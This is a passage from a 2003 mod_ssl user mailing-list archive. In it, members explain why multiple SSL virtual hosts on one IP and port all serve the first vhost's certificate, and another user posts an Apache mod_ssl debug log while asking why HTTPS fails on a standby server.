	id 279212AA02A; Sat, 15 Mar 2003 08:13:07 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailrelay.dnho.net (raq720.uk2net.com [213.239.58.49])
	by master.modssl.org (Postfix) with ESMTP id D377A2AA01F
	for ; Sat, 15 Mar 2003 08:13:05 +0100 (CET)
Received: from 210.49.111.228.optusnet.com.au ([210.49.111.228] helo=lt)
	by mailrelay.dnho.net with asmtp (Exim 4.12)
	id 18u5qk-0006II-00
	for modssl-users@modssl.org; Sat, 15 Mar 2003 07:12:59 +0000
Message-ID: <080b01c2eac2$3c44ebe0$0104000a@lt>
From: "Jeff" 
To: 
References: <3E71EE1E.22772.80B9F98@localhost> <3E723FED.11334.94B3504@localhost>
Subject: Re: problem installing cert on virtual host
Date: Sat, 15 Mar 2003 17:12:20 +1000
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Actually, the answer is RTFM..

You can not have multiple SSL vhosts responding to one IP/port
combination..  The FIRST SSL vhost will ALWAYS respond when making the
connection.. This is due to how the protocol works..

Refer http://marc.theaimsgroup.com/?l=apache-modssl&m=98576871506980&w=2
for more info

Rgds
Jeff

----- Original Message -----
From: 
To: 
Sent: Saturday, March 15, 2003 4:47 PM
Subject: Re: problem installing cert on virtual host


> On 14 Mar 2003 at 17:14, Dan McComb wrote:
>
> > Thanks Beau,
> >
> > Here's the pertinent bits (this file may look a bit strange -- it's a
> > Mac OS X Server conf file, but functions in almost every way like
> > traditional http.conf file):
> > [...]
> >
> > On Friday, March 14, 2003, at 04:58  PM, beau@beaucox.com wrote:
> >
> > > On 14 Mar 2003 at 16:20, Dan McComb wrote:
> > >
> > >> I've successfully installed one virtual host on my server to listen
on
> > >> port 443, and it's been running great. But when I added another
> > >> virtual
> > >> host directive to listen on same port further down in the file, I
find
> > >> that the first listener is the one that "picks up" the request. This
> > >> results in an error in IE: "the identity certificate name is not
> > >> correct." If I comment out the first virtual host, the problem
> > >> disappears and the second one works fine. I need them to work
> > >> together...
> > >>
> > >> Anyone know how can I configure my virtual hosts/httpd.conf to avoid
> > >> this problem?
> > >>
> > >> /dan mccomb
> > >>
> >
>> ----------------------------------------------------------------------
> > >> --
> > >> ------------
> > >>
> > > [...]
>
> Hi -
>
> I see nothing wrong with your conf file. I have some
> suggestions:
>
> * since your SSL servers work one at a time, perhaps
> this is not an SSL problem. Remember, the first
> vhost is the 'default': any request that does
> not match a name (within that ip:port group)
> is sent to that first server. Why don't you comment
> out the SSL directives, change the ports to 80,
> and see if you can browse to each vhost?
>
> * in the same vein, is you bind (dns) server setup
> OK?
>
> * you may want to look at each server cert:
>
> openssl rsa -noout -text -in .crt
>
> the subject CN should match the server name.
>
> * if you certs are self-signed, your browser
> will give you an error - that the CA is not
> recognized as trusted - but everything else
> should be OK if your CN matches the server
> name.
>
> Let me know how it goes...
>
> Aloha => Beau;
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 15 09:52:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0A7DE2AA02A; Sat, 15 Mar 2003 09:52:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id 02F932AA01F
	for ; Sat, 15 Mar 2003 09:52:21 +0100 (CET)
Received: from rocky (207.175.219.206:4976)
	by beaucox.com with [XMail 1.14 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Fri, 14 Mar 2003 22:51:59 -1000
From: beau@beaucox.com
To: 
Date: Fri, 14 Mar 2003 22:51:58 -1000
MIME-Version: 1.0
Subject: Re: problem installing cert on virtual host
Message-ID: <3E725D0E.5555.9BD02A0@localhost>
In-reply-to: <080b01c2eac2$3c44ebe0$0104000a@lt>
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: beau@beaucox.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 15 Mar 2003 at 17:12, Jeff wrote:

> Actually, the answer is RTFM..
> 
> You can not have multiple SSL vhosts responding to one IP/port
> combination..  The FIRST SSL vhost will ALWAYS respond when making the
> connection.. This is due to how the protocol works..
> 
> Refer http://marc.theaimsgroup.com/?l=apache-modssl&m=98576871506980&w=2
> for more info

Thanks Jeff - upon redoing my tests I found that
I was getting the first 443 server also; I found
the info here:

http://httpd.apache.org/docs-
2.0/ssl/ssl_faq.html#vhosts

Aloha => Beau;
> 
> Rgds
> Jeff
> 
> ----- Original Message -----
> From: 
> To: 
> Sent: Saturday, March 15, 2003 4:47 PM
> Subject: Re: problem installing cert on virtual host
> 
> 
> > On 14 Mar 2003 at 17:14, Dan McComb wrote:
> >
> > > Thanks Beau,
> > >
> > > Here's the pertinent bits (this file may look a bit strange -- it's a
> > > Mac OS X Server conf file, but functions in almost every way like
> > > traditional http.conf file):
> > > [...]
> > >
> > > On Friday, March 14, 2003, at 04:58  PM, beau@beaucox.com wrote:
> > >
> > > > On 14 Mar 2003 at 16:20, Dan McComb wrote:
> > > >
> > > >> I've successfully installed one virtual host on my server to listen
> on
> > > >> port 443, and it's been running great. But when I added another
> > > >> virtual
> > > >> host directive to listen on same port further down in the file, I
> find
> > > >> that the first listener is the one that "picks up" the request. This
> > > >> results in an error in IE: "the identity certificate name is not
> > > >> correct." If I comment out the first virtual host, the problem
> > > >> disappears and the second one works fine. I need them to work
> > > >> together...
> > > >>
> > > >> Anyone know how can I configure my virtual hosts/httpd.conf to avoid
> > > >> this problem?
> > > >>
> > > >> /dan mccomb
> > > >>
> > >
> >> ----------------------------------------------------------------------
> > > >> --
> > > >> ------------
> > > >>
> > > > [...]
> >
> > Hi -
> >
> > I see nothing wrong with your conf file. I have some
> > suggestions:
> >
> > * since your SSL servers work one at a time, perhaps
> > this is not an SSL problem. Remember, the first
> > vhost is the 'default': any request that does
> > not match a name (within that ip:port group)
> > is sent to that first server. Why don't you comment
> > out the SSL directives, change the ports to 80,
> > and see if you can browse to each vhost?
> >
> > * in the same vein, is you bind (dns) server setup
> > OK?
> >
> > * you may want to look at each server cert:
> >
> > openssl rsa -noout -text -in .crt
> >
> > the subject CN should match the server name.
> >
> > * if you certs are self-signed, your browser
> > will give you an error - that the CA is not
> > recognized as trusted - but everything else
> > should be OK if your CN matches the server
> > name.
> >
> > Let me know how it goes...
> >
> > Aloha => Beau;
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 15 15:30:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 19BA02AA02A; Sat, 15 Mar 2003 15:30:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id E52B62AA01F
	for ; Sat, 15 Mar 2003 15:30:18 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA17647;
	Sat, 15 Mar 2003 09:28:32 -0500
Date: Sat, 15 Mar 2003 09:28:31 -0500 (EST)
From: "R. DuFresne" 
To: Jeff 
Cc: modssl-users@modssl.org
Subject: Re: problem installing cert on virtual host
In-Reply-To: <080b01c2eac2$3c44ebe0$0104000a@lt>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


If this is tough to get into the FAQ, being it is asked weekly, perhps it
can be added to the footer of list messages?

Thanks,

Ron DuFresne

On Sat, 15 Mar 2003, Jeff wrote:

> Actually, the answer is RTFM..
> 
> You can not have multiple SSL vhosts responding to one IP/port
> combination..  The FIRST SSL vhost will ALWAYS respond when making the
> connection.. This is due to how the protocol works..
> 
> Refer http://marc.theaimsgroup.com/?l=apache-modssl&m=98576871506980&w=2
> for more info
> 
> Rgds
> Jeff
> 
> ----- Original Message -----
> From: 
> To: 
> Sent: Saturday, March 15, 2003 4:47 PM
> Subject: Re: problem installing cert on virtual host
> 
> 
> > On 14 Mar 2003 at 17:14, Dan McComb wrote:
> >
> > > Thanks Beau,
> > >
> > > Here's the pertinent bits (this file may look a bit strange -- it's a
> > > Mac OS X Server conf file, but functions in almost every way like
> > > traditional http.conf file):
> > > [...]
> > >
> > > On Friday, March 14, 2003, at 04:58  PM, beau@beaucox.com wrote:
> > >
> > > > On 14 Mar 2003 at 16:20, Dan McComb wrote:
> > > >
> > > >> I've successfully installed one virtual host on my server to listen
> on
> > > >> port 443, and it's been running great. But when I added another
> > > >> virtual
> > > >> host directive to listen on same port further down in the file, I
> find
> > > >> that the first listener is the one that "picks up" the request. This
> > > >> results in an error in IE: "the identity certificate name is not
> > > >> correct." If I comment out the first virtual host, the problem
> > > >> disappears and the second one works fine. I need them to work
> > > >> together...
> > > >>
> > > >> Anyone know how can I configure my virtual hosts/httpd.conf to avoid
> > > >> this problem?
> > > >>
> > > >> /dan mccomb
> > > >>
> > >
> >> ----------------------------------------------------------------------
> > > >> --
> > > >> ------------
> > > >>
> > > > [...]
> >
> > Hi -
> >
> > I see nothing wrong with your conf file. I have some
> > suggestions:
> >
> > * since your SSL servers work one at a time, perhaps
> > this is not an SSL problem. Remember, the first
> > vhost is the 'default': any request that does
> > not match a name (within that ip:port group)
> > is sent to that first server. Why don't you comment
> > out the SSL directives, change the ports to 80,
> > and see if you can browse to each vhost?
> >
> > * in the same vein, is you bind (dns) server setup
> > OK?
> >
> > * you may want to look at each server cert:
> >
> > openssl rsa -noout -text -in .crt
> >
> > the subject CN should match the server name.
> >
> > * if you certs are self-signed, your browser
> > will give you an error - that the CA is not
> > recognized as trusted - but everything else
> > should be OK if your CN matches the server
> > name.
> >
> > Let me know how it goes...
> >
> > Aloha => Beau;
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 16 01:04:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 762652AA035; Sun, 16 Mar 2003 01:04:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visualcontact.com (danmccomb.com [63.231.43.185])
	by master.modssl.org (Postfix) with SMTP id E75F12AA015
	for ; Sun, 16 Mar 2003 01:04:42 +0100 (CET)
Received: from visualcontact.com ([63.231.43.187] ) by visualcontact.com (AppleMailServer 10.1.4.0) id 104048u via TCP with SMTP; Sat, 15 Mar 2003 16:04:39 -0800
Date: Sat, 15 Mar 2003 16:04:38 -0800
Subject: Re: problem installing cert on virtual host
Content-Type: text/plain; delsp=yes; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v551)
From: Dan McComb 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <080b01c2eac2$3c44ebe0$0104000a@lt>
Message-Id: 
X-Mailer: Apple Mail (2.551)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan McComb 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks Beau and Jeff for your help in resolving this.

I was able to get it working very quickly by assigning the second  
virtual host to listen on another port number.

Best,

/dan

On Friday, March 14, 2003, at 11:12  PM, Jeff wrote:

> Actually, the answer is RTFM..
>
> You can not have multiple SSL vhosts responding to one IP/port
> combination..  The FIRST SSL vhost will ALWAYS respond when making the
> connection.. This is due to how the protocol works..
>
> Refer  
> http://marc.theaimsgroup.com/?l=apache-modssl&m=98576871506980&w=2
> for more info
>
> Rgds
> Jeff
>
> ----- Original Message -----
> From: 
> To: 
> Sent: Saturday, March 15, 2003 4:47 PM
> Subject: Re: problem installing cert on virtual host
>
>
>> On 14 Mar 2003 at 17:14, Dan McComb wrote:
>>
>>> Thanks Beau,
>>>
>>> Here's the pertinent bits (this file may look a bit strange -- it's a
>>> Mac OS X Server conf file, but functions in almost every way like
>>> traditional http.conf file):
>>> [...]
>>>
>>> On Friday, March 14, 2003, at 04:58  PM, beau@beaucox.com wrote:
>>>
>>>> On 14 Mar 2003 at 16:20, Dan McComb wrote:
>>>>
>>>>> I've successfully installed one virtual host on my server to listen
> on
>>>>> port 443, and it's been running great. But when I added another
>>>>> virtual
>>>>> host directive to listen on same port further down in the file, I
> find
>>>>> that the first listener is the one that "picks up" the request.  
>>>>> This
>>>>> results in an error in IE: "the identity certificate name is not
>>>>> correct." If I comment out the first virtual host, the problem
>>>>> disappears and the second one works fine. I need them to work
>>>>> together...
>>>>>
>>>>> Anyone know how can I configure my virtual hosts/httpd.conf to  
>>>>> avoid
>>>>> this problem?
>>>>>
>>>>> /dan mccomb
>>>>>
>>>
>>> --------------------------------------------------------------------- 
>>> -
>>>>> --
>>>>> ------------
>>>>>
>>>> [...]
>>
>> Hi -
>>
>> I see nothing wrong with your conf file. I have some
>> suggestions:
>>
>> * since your SSL servers work one at a time, perhaps
>> this is not an SSL problem. Remember, the first
>> vhost is the 'default': any request that does
>> not match a name (within that ip:port group)
>> is sent to that first server. Why don't you comment
>> out the SSL directives, change the ports to 80,
>> and see if you can browse to each vhost?
>>
>> * in the same vein, is you bind (dns) server setup
>> OK?
>>
>> * you may want to look at each server cert:
>>
>> openssl rsa -noout -text -in .crt
>>
>> the subject CN should match the server name.
>>
>> * if you certs are self-signed, your browser
>> will give you an error - that the CA is not
>> recognized as trusted - but everything else
>> should be OK if your CN matches the server
>> name.
>>
>> Let me know how it goes...
>>
>> Aloha => Beau;
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

------------------------------------------------------------------------ 
------------

Visual Contact
311 First Ave. S, Suite 200
Seattle, WA 98104

206.223.0417 Office
206.718.5361 Cell

dan@visualcontact.com
http://www.visualcontact.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 00:49:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D04DC2AA035; Mon, 17 Mar 2003 00:49:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rdsl_mlb_mx1.requestdsl.com.au (rdsl-mlb-mx1.requestdsl.com.au [202.138.194.10])
	by master.modssl.org (Postfix) with ESMTP id B33BD2AA01A
	for ; Mon, 17 Mar 2003 00:49:07 +0100 (CET)
content-class: urn:content-classes:message
Subject: SSL aware server not encrypting
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2EC16.706DADDC"
Date: Mon, 17 Mar 2003 10:47:43 +1100
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B59014EA658@rdsl_mlb_mx1.requestdsl.com.au>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL aware server not encrypting
Thread-Index: AcLsFnAthK87keFgQgy/BFC0T0qfEw==
From: "Vince Montuoro" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2EC16.706DADDC
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

    I 've had this problem for a while, i have two servers, Only one is =
publiccly visible at any one time,  when the first goes down i (should =
be) enable the second one on our firewall by changeing the nat.  BUT on =
the second server apache never seems to negoiate a secure connection!
=20
by this i mean "https" will not work, but   =
http://....:443 will work.
=20
Both servers have an identical build and config structure.
=20
For you help i have include the ssl log level (debug)
=20
[17/Mar/2003 10:32:25 01224] [info]  Server: Apache/1.3.26, Interface: =
mod_ssl/2.8.10, Library: OpenSSL/0.9.6d
[17/Mar/2003 10:32:25 01224] [warn]  You are using mod_ssl under Win32. =
This combination is *NOT* officially supported. Use it at your own risk!
[17/Mar/2003 10:32:25 01224] [info]  Init: 1st startup round (still not =
detached)
[17/Mar/2003 10:32:25 01224] [info]  Init: Initializing OpenSSL library
[17/Mar/2003 10:32:25 01224] [info]  Init: Loading certificate & private =
key of SSL-aware server mytest.com.au:443
[17/Mar/2003 10:32:25 01224] [trace] Init: (mytest.com.au:443) =
unencrypted RSA private key - pass phrase not required
[17/Mar/2003 10:32:25 01224] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:25 01224] [info]  Init: Generating temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:25 01224] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session Cache (DBM) =
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Initializing (virtual) =
servers for SSL
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring server =
mytest.com.au:443 for SSL protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) Creating =
new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring permitted SSL ciphers =
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring client authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate: /O=3DVeriSign Trust =
Network/OU=3DVeriSign, Inc./OU=3DVeriSign International Server CA - =
Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 =
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] [info]  Init: (mytest.com.au:443) RSA =
server certificate enables Server Gated Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server private key
[17/Mar/2003 10:32:26 01224] [info]  Init: 2nd startup round (already =
detached)
[17/Mar/2003 10:32:26 01224] [info]  Init: Reinitializing OpenSSL =
library
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session Cache (DBM) =
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Initializing (virtual) =
servers for SSL
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring server =
mytest.com.au:443 for SSL protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) Creating =
new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring permitted SSL ciphers =
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring client authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate: /O=3DVeriSign Trust =
Network/OU=3DVeriSign, Inc./OU=3DVeriSign International Server CA - =
Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 =
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] [info]  Init: (mytest.com.au:443) RSA =
server certificate enables Server Gated Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server private key
[17/Mar/2003 10:32:27 00912] [info]  Server: Apache/1.3.26, Interface: =
mod_ssl/2.8.10, Library: OpenSSL/0.9.6d
[17/Mar/2003 10:32:27 00912] [warn]  You are using mod_ssl under Win32. =
This combination is *NOT* officially supported. Use it at your own risk!
[17/Mar/2003 10:32:27 00912] [info]  Init: 1st startup round (still not =
detached)
[17/Mar/2003 10:32:27 00912] [info]  Init: Initializing OpenSSL library
[17/Mar/2003 10:32:27 00912] [info]  Init: Loading certificate & private =
key of SSL-aware server mytest.com.au:443
[17/Mar/2003 10:32:27 00912] [trace] Init: (mytest.com.au:443) =
unencrypted RSA private key - pass phrase not required
[17/Mar/2003 10:32:27 00912] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:27 00912] [info]  Init: Generating temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [trace] Inter-Process Session Cache (DBM) =
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:28 00912] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Initializing (virtual) =
servers for SSL
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring server =
mytest.com.au:443 for SSL protocol
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) Creating =
new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring permitted SSL ciphers =
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring client authentication
[17/Mar/2003 10:32:28 00912] [trace] CA certificate: /O=3DVeriSign Trust =
Network/OU=3DVeriSign, Inc./OU=3DVeriSign International Server CA - =
Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 =
VeriSign
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring RSA server certificate
[17/Mar/2003 10:32:28 00912] [info]  Init: (mytest.com.au:443) RSA =
server certificate enables Server Gated Cryptography (SGC)
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring RSA server private key

=20
=20
=20
=20
Regards,=20
  =20
Vince=20

------_=_NextPart_001_01C2EC16.706DADDC
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









    I=20
've had this problem for a while, i have two servers, Only one is =
publiccly=20
visible at any one time,  when the first goes down i (should be) =
enable the=20
second one on our firewall by changeing the nat.  BUT on the second =
server=20
apache never seems to negoiate a secure connection!


 


by =
this i mean=20
"https" will not work, but http://....:443 will work.


 


Both =
servers have an=20
identical build and config structure.


 


For =
you help i have=20
include the ssl log level (debug)


 


[17/Mar/2003=20
10:32:25 01224] [info]  Server: Apache/1.3.26, Interface: =
mod_ssl/2.8.10,=20
Library: OpenSSL/0.9.6d
[17/Mar/2003 10:32:25 01224] [warn]  You =
are=20
using mod_ssl under Win32. This combination is *NOT* officially =
supported. Use=20
it at your own risk!
[17/Mar/2003 10:32:25 01224] [info]  Init: =
1st=20
startup round (still not detached)
[17/Mar/2003 10:32:25 01224] =
[info] =20
Init: Initializing OpenSSL library
[17/Mar/2003 10:32:25 01224] =
[info] =20
Init: Loading certificate & private key of SSL-aware server=20
mytest.com.au:443
[17/Mar/2003 10:32:25 01224] [trace] Init:=20
(mytest.com.au:443) unencrypted RSA private key - pass phrase not=20
required
[17/Mar/2003 10:32:25 01224] [info]  Init: Seeding PRNG =
with=20
136 bytes of entropy
[17/Mar/2003 10:32:25 01224] [info]  Init:=20
Generating temporary RSA private keys (512/1024 bits)
[17/Mar/2003 =
10:32:25=20
01224] [info]  Init: Configuring temporary DH parameters (512/1024=20
bits)
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session =
Cache (DBM)=20
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] =
[info] =20
Init: Seeding PRNG with 136 bytes of entropy
[17/Mar/2003 10:32:26 =
01224]=20
[info]  Init: Configuring temporary RSA private keys (512/1024=20
bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring =
temporary=20
DH parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] =
[info]  Init:=20
Initializing (virtual) servers for SSL
[17/Mar/2003 10:32:26 01224]=20
[info]  Init: Configuring server mytest.com.au:443 for SSL=20
protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Creating new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 =
01224]=20
[trace] Init: (mytest.com.au:443) Configuring permitted SSL ciphers=20
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003=20
10:32:26 01224] [trace] Init: (mytest.com.au:443) Configuring client=20
authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate:=20
/O=3DVeriSign Trust Network/OU=3DVeriSign, Inc./OU=3DVeriSign =
International Server CA=20
- Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97=20
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] =
[info] =20
Init: (mytest.com.au:443) RSA server certificate enables Server Gated=20
Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init:=20
(mytest.com.au:443) Configuring RSA server private key
[17/Mar/2003 =
10:32:26=20
01224] [info]  Init: 2nd startup round (already =
detached)
[17/Mar/2003=20
